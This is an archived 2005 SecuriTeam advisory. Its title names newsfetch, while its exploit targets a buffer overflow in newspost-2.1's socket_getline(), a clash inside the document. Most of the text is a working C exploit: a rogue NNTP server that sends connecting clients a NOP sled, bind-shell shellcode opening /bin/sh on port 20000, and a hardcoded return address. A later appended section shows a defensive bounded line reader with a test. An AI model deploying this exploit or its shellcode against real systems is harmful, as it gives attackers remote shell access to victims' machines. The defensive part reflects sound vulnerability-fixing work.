[EXPL] newsfetch Buffer Overflow Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 02/03/05

    To: list@securiteam.com
    Date: 3 Feb 2005 18:27:22 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      newsfetch Buffer Overflow Exploit
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.securiteam.com/unixfocus/5RP050KEUK.html> newsfetch is "a
    powerful utility to fetch news from an NNTP server and stores in the
    mailbox format. The files created by newsfetch can be used with any mail
    reader".

    Due to poor handling of provided input, an attacker can cause newsfetch to
    overflow an internal buffer. The following exploit code can be used to
    test your system for the mentioned vulnerability.

    DETAILS

    Exploit:
    /*
    02/03/2005
    NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit
     
    Client Usage
    ------------
    cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic <file>
     
    Greetz fly to my girlfriend YASMIN H.
     
                                                        ?
                                                       ?M
                       M ?MMM
                       MMm ?MMMM
                       M$$MMm ?MMMMM.
                       MM$$MMMMm MMMMMMMM
                       `MM$$MMMMMMm 4MMMM$$MM
                        MMM$$MMMMMMMMm ?MMMM$$MMM
                         MMM$$$MMMMMMMMm mMMMM$MMMM
                          `MMM$$$MMMMMMMm MMMM$MMMM?
                            MMMM$$$MMMMMMMm MMM$$MMM?
                             `MMMMMMMMMMMMMm MMMMMMM?
                               `MMMMMMMMMMMMMm MMMMMM
                                  `MMMMMMMMMMMM MMMMM
                                     `MMMMMMMMMM MMMMM
                                        `MMMMMMMMMMMM
                                          MMMMMMMMMMM
                                   mmMMMMMMMMMMMMMMMMM
                               mmMMMMMMMMMMMMMMMMMMMMMM
                              ?MMM#MMMMMMMMMMMMMMMMMMMMm
                            4MMM< >MMMMMMMMMMMMMMMMMMMM
                           MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
                          4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                           MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                           MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                            MMMMMMMMMMMMMMMMMMMMMMMMMMMM
           ?Mn ?MMMMMMMMMMMMMMMMMMMMMMMMM ?Mnn
           nM `MMMMMMMMMMMMMMMMMMMMMM? n?
            `? MMMMMMMMMMMMMMMMM? n?
                                         MMMMMM?
                                        mtr?
     
     
         mMMM nmM mM
       mM?? M ' M n
     mM$ nM n?MMn?
    4M m ?M N ?
    ?`
    m? `n? mM NM? NM
    mM mMm nm M??M ? n?Mm ?n xn , ? ?n xn ?Mm Mn n?
    nM
    nMm
     mM `mMM? nM M nM ,` ?n? y M ?n? y nM ? nM
        ?
      M? M' ? M n.,? nm nM nM n M ?
    ? n
       MM? mM M nM M? n , nM ? nM M nM M M
    M? M
    n
         MMM? M? nM M M n?nN ?M nM ?M `?M? ?? .N
    nM
    ?nM?
               M?
             n? cybertronic 2oo5
            ? ________________
                                                        
    ----------------------/
     
     
     
                    MMMMMMMMm mMMMMMMM?
                 ?MM$MMMMMMMMMm mMMMMMMMMM$MM`
                 MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
                 MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
                 MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
                   `MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM?
     
                            just want to say love you dad!
    */
     
    #include <stdio.h>
    #include <stdlib.h>     /* exit(), system() */
    #include <string.h>     /* memset(), memcpy(), strcat(), strncat(), strlen() */
    #include <strings.h>    /* bzero() */
    #include <unistd.h>     /* fork(), close(), write(), sleep() */
    #include <signal.h>
    #include <sys/socket.h> /* socket(), bind(), listen(), accept() */
    #include <netinet/in.h>
    #include <arpa/inet.h>  /* inet_ntoa() */
    #include <netdb.h>
     
    #define RED "\E[31m\E[1m"
    #define GREEN "\E[32m\E[1m"
    #define YELLOW "\E[33m\E[1m"
    #define BLUE "\E[34m\E[1m"
    #define NORMAL "\E[m"
     
    #define PORT 119
    #define BACKLOG 5
     
    //92 bytes bindcode port 20000
    char scode[] =
    "\x31\xdb" // xor ebx, ebx
    "\xf7\xe3" // mul ebx
    "\xb0\x66" // mov al, 102
    "\x53" // push ebx
    "\x43" // inc ebx
    "\x53" // push ebx
    "\x43" // inc ebx
    "\x53" // push ebx
    "\x89\xe1" // mov ecx, esp
    "\x4b" // dec ebx
    "\xcd\x80" // int 80h
    "\x89\xc7" // mov edi, eax
    "\x52" // push edx
    "\x66\x68\x4e\x20" // push word 8270
    "\x43" // inc ebx
    "\x66\x53" // push bx
    "\x89\xe1" // mov ecx, esp
    "\xb0\xef" // mov al, 239
    "\xf6\xd0" // not al
    "\x50" // push eax
    "\x51" // push ecx
    "\x57" // push edi
    "\x89\xe1" // mov ecx, esp
    "\xb0\x66" // mov al, 102
    "\xcd\x80" // int 80h
    "\xb0\x66" // mov al, 102
    "\x43" // inc ebx
    "\x43" // inc ebx
    "\xcd\x80" // int 80h
    "\x50" // push eax
    "\x50" // push eax
    "\x57" // push edi
    "\x89\xe1" // mov ecx, esp
    "\x43" // inc ebx
    "\xb0\x66" // mov al, 102
    "\xcd\x80" // int 80h
    "\x89\xd9" // mov ecx, ebx
    "\x89\xc3" // mov ebx, eax
    "\xb0\x3f" // mov al, 63
    "\x49" // dec ecx
    "\xcd\x80" // int 80h
    "\x41" // inc ecx
    "\xe2\xf8" // loop lp
    "\x51" // push ecx
    "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
    "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
    "\x89\xe3" // mov ebx, esp
    "\x51" // push ecx
    "\x53" // push ebx
    "\x89\xe1" // mov ecx, esp
    "\xb0\xf4" // mov al, 244
    "\xf6\xd0" // not al
    "\xcd\x80"; // int 80h
     
    void cmd ( int connfd );
    void header ();
     
    int
    main ( int argc, char* argv[] )
    {
            int listenfd, connfd;
            pid_t childpid;
            socklen_t clilen;
            struct sockaddr_in cliaddr, servaddr;
     
            header ();
            printf ( "[*] Creating socket..." );
            if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
            {
                    printf ( RED "FAILED!\n" NORMAL );
                    exit ( 1 );
            }
            printf ( GREEN "OK!\n" NORMAL );
            bzero ( &servaddr, sizeof ( servaddr ) );
            servaddr.sin_family = AF_INET;
            servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
            servaddr.sin_port = htons ( PORT );
     
            if ( bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ) == -1 )
            {
                    printf ( RED "bind FAILED!\n" NORMAL );
                    exit ( 1 );
            }
            printf ( "[*] Listening..." );
            if ( listen ( listenfd, BACKLOG ) == -1 )
            {
                    printf ( RED "FAILED!\n" NORMAL );
                    exit ( 1 );
            }
            printf ( GREEN "OK!\n" NORMAL );
     
            for ( ; ; )
            {
                    clilen = sizeof ( cliaddr );
     
                    if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
                    {
                            close ( listenfd );
                            exit ( 1 );
                    }
     
                    if ( ( childpid = fork ( ) ) == 0 )
                    {
                            close ( listenfd );
                            printf ( "[*]" GREEN " Incoming connection from:\t %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
                            cmd ( connfd );
                            exit ( 0 ); /* the child is done once the payload has been sent */
                    }
                    close ( connfd );
            }
    }
     
    void
    cmd ( int s )
    {
            char in[1024], out[1200];
            unsigned long ret = 0xbfffecb8;
     
            bzero ( &out, 1200 );
            memset ( out, 0x90, 956 ); //956
            memcpy ( out + 956, scode, sizeof ( scode ) );
            strcat ( out, "\x41\x41\x41\x41" );
            strncat ( out, ( char * ) &ret, 4 ); /* append the return address, little-endian */
            printf ( "[*] Sending Bad Packet [ %zu bytes ]...", strlen ( out ) );
            if ( write ( s, out, strlen ( out ) ) <= 0 )
            {
                    printf ( RED "FAILED!\n" NORMAL);
                    exit ( 1 );
            }
            printf ( GREEN "OK!\n" NORMAL);
            sleep ( 1 );
    }
     
    void
    header ()
    {
            system ( "clear" );
            printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "### " GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# " YELLOW "###\n" NORMAL );
            printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "#  # " GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# " YELLOW "#\n" NORMAL );
            printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "### " GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#\n" NORMAL );
            printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "#  # " GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# " YELLOW "#\n" NORMAL );
            printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "#  # " GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# " YELLOW "###\n" NORMAL );
            printf ( RED " cybertronic@gmx.net\n" NORMAL );
            printf ( RED " ----------(c) 2005----------\n\n" NORMAL );

            printf ( "newspost-2.1\n\n" );
    }
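    The advisory attributes the overflow to socket_getline() reading a server reply into a fixed-size buffer without bounding the copy. The following C example, added here and not part of the advisory or of the newspost/newsfetch sources, shows the bounded line reader that prevents this class of bug, fed from a constructed in-memory stream standing in for recv(). The 1024-byte buffer size, the NNTP reply texts and the canary bytes are assumptions chosen for the example; the 1056-byte oversized line matches the length of the packet the exploit above sends.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Return codes of the bounded reader. */
#define LINE_OK        0
#define LINE_TOO_LONG -1
#define LINE_EOF      -2

/* Stand-in for a socket: a byte buffer with a read cursor, so the example runs
 * offline. In a real client this would wrap recv(); constructed for the example. */
struct stream {
    const unsigned char *data;
    size_t len;
    size_t pos;
};

/* Fetch one byte; returns 1 on success, 0 when the stream is exhausted. */
static int stream_getc(struct stream *s, unsigned char *c)
{
    if (s->pos >= s->len)
        return 0;
    *c = s->data[s->pos++];
    return 1;
}

/* Read one line into buf, never storing more than bufsize bytes (terminator included).
 * A line that would not fit is drained up to its '\n', buf is left empty and
 * LINE_TOO_LONG is returned, so the caller can drop the connection instead of
 * letting the bytes spill past the buffer. CRLF is stripped. */
int bounded_getline(struct stream *s, char *buf, size_t bufsize)
{
    size_t n = 0;
    unsigned char c;

    if (bufsize == 0)
        return LINE_TOO_LONG;
    while (stream_getc(s, &c)) {
        if (c == '\n') {
            if (n > 0 && buf[n - 1] == '\r')
                n--;
            buf[n] = '\0';
            return LINE_OK;
        }
        if (n + 1 >= bufsize) {          /* no room for this byte plus the terminator */
            buf[0] = '\0';
            while (stream_getc(s, &c) && c != '\n')
                ;                         /* discard the rest of the offending line */
            return LINE_TOO_LONG;
        }
        buf[n++] = (char)c;
    }
    if (n == 0)
        return LINE_EOF;
    buf[n] = '\0';                        /* last line arrived without a newline */
    return LINE_OK;
}

#define LINEBUF 1024   /* receive buffer size assumed for the example */
#define BAD_LEN 1056   /* same length as the packet sent by the exploit above */

/* Constructed server stream: a normal greeting, an oversized line, a normal reply.
 * Returns the number of checks that pass (3 when all hold): the greeting is read
 * intact, the oversized line is rejected without touching the canary bytes placed
 * after the buffer, and the reader resynchronises on the following line. */
int demo_reader(void)
{
    static unsigned char bytes[64 + BAD_LEN + 1 + 64];
    const char *greeting = "200 news.example NNTP service ready\r\n";
    const char *after = "340 Ok\r\n";
    char buf[LINEBUF + 8];               /* 8 canary bytes follow the real buffer */
    struct stream s;
    size_t len = 0;
    int passed = 0;

    memcpy(bytes + len, greeting, strlen(greeting)); len += strlen(greeting);
    memset(bytes + len, 'A', BAD_LEN);               len += BAD_LEN;
    bytes[len++] = '\n';
    memcpy(bytes + len, after, strlen(after));       len += strlen(after);
    s.data = bytes; s.len = len; s.pos = 0;
    memset(buf, 0, sizeof buf);
    memset(buf + LINEBUF, 0xCC, 8);

    if (bounded_getline(&s, buf, LINEBUF) == LINE_OK &&
        strcmp(buf, "200 news.example NNTP service ready") == 0)
        passed++;
    if (bounded_getline(&s, buf, LINEBUF) == LINE_TOO_LONG && buf[0] == '\0')
        passed++;
    if (bounded_getline(&s, buf, LINEBUF) == LINE_OK && strcmp(buf, "340 Ok") == 0 &&
        (unsigned char)buf[LINEBUF] == 0xCC)         /* canary untouched */
        passed++;
    return passed;
}

int main(void)
{
    printf("checks passed: %d of 3\n", demo_reader());
    return 0;
}
```

    The property that matters is that the write index is compared against the buffer size before every store, and an over-long line is reported rather than silently truncated, so a client can log the event and close the connection. The same shape applies to any fixed-buffer protocol reader; the overflow in socket_getline() is what happens when that comparison is missing.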

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cybertronic@gmx.net> cybertronic.

